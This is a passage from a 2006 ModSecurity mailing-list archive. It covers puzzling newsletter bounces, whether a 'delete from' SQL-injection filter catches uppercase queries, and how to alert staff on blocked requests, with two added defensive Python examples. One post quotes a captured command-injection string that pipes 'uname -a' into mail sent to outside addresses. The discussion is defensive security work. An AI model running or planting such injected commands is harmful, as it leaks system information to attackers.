From: Ivan Ristic <ivan.ristic@gm...> - 2006-06-20 20:27:14
On 6/20/06, Dick Schiferli <dicks@...> wrote:
> Hi everyone,
>
> I have posted a message related to this before but the fix I implemented did
> not work. So here is another try, hope someone can help.
>
> We use a newsletter system on our server called FUMP from http://www.sellwide.com.
> It is a purchased solution. In our htaccess we have form protection and a
> lot more.
>
> This application consists of a file called "responder.cgi" that is embedded
> on our php pages and captures the newsletter signup information. Then there
> is a bounced.cgi that checks the POP3 box for bounced emails (when people
> sign up for fun). There is a bounced email address defined in the
> application where all bounced emails are returned to. The application picks
> them up and processes them.
>
> Now here is what can be seen:
>
> 1. In the bounced email list of the newsletter app there are emails from the
> root domain of my server (with error 5.0.0). Most of them have only one
> letter in front of @, latin and chinese. These are not from people that
> signed up.
> 2. There are no logs in modsecurity of script attacks to the two cgi scripts
> mentioned above.
> 3. Even if I block the root domain name in modsecurity the emails still
> appear (even with secfilter).
> 4. If I block the root domain in the newsletter account, the strange bounced
> emails still appear in the bounced list.
> 5. We're not seeing that any spam emails are sent from our server.
>
> I'd like to find out how this can happen and how to prevent it (assuming it
> is harmful). I've informed the company of this application too. Does anyone
> have an idea where and how to look?

I suspect the email field in the submitted form is an incomplete email address (e.g. "ivanr"). When an attempt is made to send an email to such an address (on Unix) the mail server will assume you are trying to send to (from) the local user, in which case it will append the default domain name. That would explain why the rule isn't working.

To confirm or deny this you'd need to look at the audit log entry, find the parameter that is supposed to transport the email address and determine if there's a complete email address there or not. Let us know.

--
Ivan Ristic, Technical Director
Thinking Stone, http://www.thinkingstone.com
ModSecurity: Open source Web Application Firewall
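The check described in the reply above, as an added example that is not part of the original post: it decodes a form-encoded request body taken from an audit log entry and reports whether the address parameter holds a complete address or a bare local part that a Unix mail server would complete with its own domain. The parameter name `email`, the default domain `example.org` and the sample bodies are assumptions constructed for illustration.

```python
from urllib.parse import parse_qs

# Constructed request bodies, as they might be copied out of audit log entries.
SAMPLE_BODIES = [
    "name=Ivan&email=ivanr",            # bare local part
    "name=A&email=a",                   # single Latin letter
    "name=B&email=%E4%B8%AD",           # single non-Latin character
    "name=C&email=user%40example.com",  # complete address
]

def classify_address(value):
    """Return 'complete', 'incomplete' or 'empty' for a submitted address."""
    value = value.strip()
    if not value:
        return "empty"
    local, at, domain = value.rpartition("@")
    # No "@", nothing before it, or no dotted domain after it.
    if not at or not local or "." not in domain.strip("."):
        return "incomplete"
    return "complete"

def audit_email_field(body, field="email", default_domain="example.org"):
    """Decode one form-encoded body and report on every value of `field`.

    Returns (raw value, classification, rewritten address). The last item
    is set only when the value has no "@" at all: that is the case where
    the local mail server appends its default domain.
    """
    findings = []
    for raw in parse_qs(body, keep_blank_values=True).get(field, []):
        bare = raw.strip()
        rewritten = f"{bare}@{default_domain}" if bare and "@" not in bare else None
        findings.append((raw, classify_address(raw), rewritten))
    return findings

if __name__ == "__main__":
    for body in SAMPLE_BODIES:
        for raw, kind, rewritten in audit_email_field(body):
            note = f" -> delivered as {rewritten}" if rewritten else ""
            print(f"{kind:10} {raw!r}{note}")
```

A rule that matches on the server's domain in the request never sees it in these cases, because the domain is added by the mail server after the request has been processed.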
From: Dick Schiferli <dicks@sc...> - 2006-06-20 13:03:24
Hi everyone,

I have posted a message related to this before but the fix I implemented did not work. So here is another try, hope someone can help.

We use a newsletter system on our server called FUMP from http://www.sellwide.com. It is a purchased solution. In our htaccess we have form protection and a lot more.

This application consists of a file called "responder.cgi" that is embedded on our php pages and captures the newsletter signup information. Then there is a bounced.cgi that checks the POP3 box for bounced emails (when people sign up for fun). There is a bounced email address defined in the application where all bounced emails are returned to. The application picks them up and processes them.

Now here is what can be seen:

1. In the bounced email list of the newsletter app there are emails from the root domain of my server (with error 5.0.0). Most of them have only one letter in front of @, latin and chinese. These are not from people that signed up.
2. There are no logs in modsecurity of script attacks to the two cgi scripts mentioned above.
3. Even if I block the root domain name in modsecurity the emails still appear (even with secfilter).
4. If I block the root domain in the newsletter account, the strange bounced emails still appear in the bounced list.
5. We're not seeing that any spam emails are sent from our server.

I'd like to find out how this can happen and how to prevent it (assuming it is harmful). I've informed the company of this application too. Does anyone have an idea where and how to look?

Thanks
Dick
From: Bram Biesbrouck <b@be...> - 2006-06-20 12:40:00
Hi all,

I was wondering if the following rule:

SecFilterSelective ARGS "delete[[:space:]]+from"

also triggers when SQL-injection is performed with the SQL-query in uppercase (DELETE FROM table)? If not, perhaps the modsecurity-general.conf, etc rules should be updated?

Bram
From: Ryan Barnett <rcbarnett@gm...> - 2006-06-20 11:28:31
For alerting purposes, I use CGI scripts. In my modsecurity default action directive, I specify a 403 Forbidden status code. I then use the Apache ErrorDocument directive to point to a CGI script. The CGI script will present the client with an error message webpage and then send an email to the security folks. The email contains a CGI ENV dump of all of the session tokens (same output as the printenv cgi script). So essentially, the email that I receive is a snapshot of the attacker's request ENV. I also add in some weblinks to helpful public websites for tracking down the client's location/whois info, etc...

--
Ryan C. Barnett
Web Application Security Consortium (WASC) Member
CIS Apache Benchmark Project Lead
SANS Instructor, GCIA, GCFA, GCIH, GSNA, GCUX, GSEC
Author: Preventing Web Attacks with Apache

On 6/20/06, Brent Clark <bclark@...> wrote:
>
> Hey all
>
> Using the brilliant mod_security, I came across a string with the
> following in.
>
> mail%20-s%20uname_i2_217.199.186.118%20kkparole@...;uname%20-
> a%20|%20mail%20-s%20uname_i2_217.199.186.118%20michaelroul@...;
>
> My question is, what can be done to alert some security overseer and
> help stop cyber crime.
>
> Kind Regards
> Brent Clark
>
>
> _______________________________________________
> mod-security-users mailing list
> mod-security-users@...
> https://lists.sourceforge.net/lists/listinfo/mod-security-users
>
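A sketch of the alerting CGI described in the message above, as an added example that is not the poster's script: it builds the alert mail from the environment Apache passes to an ErrorDocument handler and strips control characters from request data before using it in the Subject line. The addresses, the local SMTP relay and the sample environment are assumptions constructed for illustration.

```python
import os
import smtplib
from email.message import EmailMessage

# Constructed sample of the environment an ErrorDocument CGI sees after a 403.
SAMPLE_ENV = {
    "REMOTE_ADDR": "192.0.2.10",
    "REDIRECT_STATUS": "403",
    "REDIRECT_URL": "/cgi-bin/form.cgi\r\nBcc: x@example.net",
    "REDIRECT_QUERY_STRING": "q=test",
    "HTTP_USER_AGENT": "ExampleAgent/1.0",
}

def printable(value, limit=200):
    """Request data is attacker-controlled: drop control characters, cap length."""
    return "".join(c if c.isprintable() else "?" for c in value)[:limit]

def build_alert(environ, sender, recipient):
    """Build the alert mail: a one-line summary plus a printenv-style dump."""
    msg = EmailMessage()
    msg["From"] = sender
    msg["To"] = recipient
    client = printable(environ.get("REMOTE_ADDR", "unknown"))
    url = printable(environ.get("REDIRECT_URL", "unknown"))
    # Without printable() a CR/LF in the URL would make this header invalid.
    msg["Subject"] = f"ModSecurity 403: {client} requested {url}"
    dump = [f"{k}={printable(v, 2000)}" for k, v in sorted(environ.items())]
    msg.set_content("\n".join(dump) + "\n")
    return msg

if __name__ == "__main__":
    live = "GATEWAY_INTERFACE" in os.environ  # set by the server for CGI runs
    env = dict(os.environ) if live else SAMPLE_ENV
    # Page shown to the blocked client.
    print("Content-Type: text/plain\n\nYour request was blocked.")
    alert = build_alert(env, "waf@example.org", "security@example.org")
    if live:
        with smtplib.SMTP("localhost") as smtp:  # assumed local relay
            smtp.send_message(alert)
    else:
        print(alert)  # offline run: show the mail instead of sending it
```

Because every blocked request produces one mail, a deployment would normally rate-limit or batch these alerts so that a scan does not flood the security mailbox.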
From: Brent Clark <bclark@ec...> - 2006-06-20 10:25:22
Hey all

Using the brilliant mod_security, I came across a string with the following in.

mail%20-s%20uname_i2_217.199.186.118%20kkparole@...;uname%20-a%20|%20mail%20-s%20uname_i2_217.199.186.118%20michaelroul@...;

My question is, what can be done to alert some security overseer and help stop cyber crime.

Kind Regards
Brent Clark